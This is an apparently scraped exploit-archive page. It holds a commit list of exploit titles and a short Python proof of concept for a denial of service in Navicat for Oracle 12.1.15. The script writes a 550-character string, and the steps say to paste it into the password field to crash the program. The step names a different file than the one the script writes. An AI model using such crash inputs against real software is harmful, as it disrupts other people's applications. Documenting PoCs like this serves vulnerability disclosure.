f3f1427938
9 changes to exploits/shellcodes ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS) ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC) AirMore 1.6.1 - Denial of Service (PoC) Free IP Switcher 3.1 - 'Computer Name' Denial of Service (PoC) Navicat for Oracle 12.1.15 - _Password_ Denial of Service (PoC) VSCO 1.1.1.0 - Denial of Service (PoC) Linux - 'kvm_ioctl_create_device()' NULL Pointer Dereference Webiness Inventory 2.3 - SQL Injection Webiness Inventory 2.3 - 'order' SQL Injection MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery Jinja2 2.10 - 'from_string' Server Side Template Injection qdPM 9.1 - 'search_by_extrafields[]' SQL Injection UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload
29 lines
No EOL
969 B
Python
Executable file
29 lines
No EOL
969 B
Python
Executable file
#Exploit Title: Navicat for Oracle 12.1.15 - "Password" Denial of Service (PoC)
|
|
#Discovery by: Victor Mondragón
|
|
#Discovery Date: 2019-02-14
|
|
#Vendor Homepage: https://www.navicat.com/es/
|
|
#Software Link: https://www.navicat.com/es/download/navicat-for-oracle
|
|
#Tested Version: 12.1.15
|
|
#Tested on: Windows 10 Single Language x64/ Windows 7 x64 Service Pack 1
|
|
|
|
#Steps to produce the crash:
|
|
#1.- Run python code: Navicat_for_Oracle_12.1.15.py
|
|
#2.- Open code.txt and copy content to clipboard
|
|
#2.- Open Navicat for Oracle 12.1.15
|
|
#3.- Select "Conexión"
|
|
#4.- Select "Oracle"
|
|
#5.- In "Nombre de conexión" type "Test"
|
|
#6.- In "Tipo de conexión" select "Basic"
|
|
#7.- In "Host" type 1.1.1.1
|
|
#8.- In "Puerto" type "1521"
|
|
#9.- In "Nombre del servicio" type ORCL
|
|
#10.- In "Nombre de usuario" type "user"
|
|
#11.- In "Contraseña" Paste Clipboard
|
|
#12.- Select "Aceptar"
|
|
#13.- Crashed
|
|
|
|
cod = "\x41" * 550
|
|
|
|
f = open('string.txt', 'w')
|
|
f.write(cod)
|
|
f.close() |